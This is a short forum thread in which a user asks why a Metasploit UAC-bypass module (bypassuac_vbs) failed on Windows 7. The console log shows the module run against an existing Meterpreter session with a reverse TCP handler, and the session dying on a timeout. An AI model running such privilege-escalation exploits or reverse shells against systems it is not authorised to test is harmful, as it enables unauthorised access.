isaac_204 Posted January 8, 2017 Share Posted January 8, 2017 Hello guys I ran into a problem trying to bypass the UAC on my Windows 7 machine. I used the bypassuac_vbs exploit but this is what happened. Thanks in advance! msf exploit(handler) > use exploit/windows/local/bypassuac_vbs msf exploit(bypassuac_vbs) > show options Module options (exploit/windows/local/bypassuac_vbs): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on. Exploit target: Id Name -- ---- 0 Automatic msf exploit(bypassuac_vbs) > set SESSION 1 SESSION => 1 msf exploit(bypassuac_vbs) > exploit -j [*] Exploit running as background job. [*] Started reverse TCP handler on 192.168.1.14:4444 msf exploit(bypassuac_vbs) > [+] Windows 7 (Build 7601, Service Pack 1). may be vulnerable. [*] UAC is Enabled, checking level... [*] 192.168.1.5 - Meterpreter session 1 closed. Reason: Died [-] Exploit failed: Rex::TimeoutError Operation timed out. Quote Link to comment Share on other sites More sharing options...
SuperHofstad Posted January 14, 2017 Share Posted January 14, 2017 Does it close when you send " exploit -j " ? Or is it timed? Quote Link to comment Share on other sites More sharing options...
isaac_204 Posted January 14, 2017 Author Share Posted January 14, 2017 It closes Meterpreter session 1 closed. Reason: Died and then Exploit failed: Timeout error. Check the last two lines of the post I wrote! Thanks in advance! Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.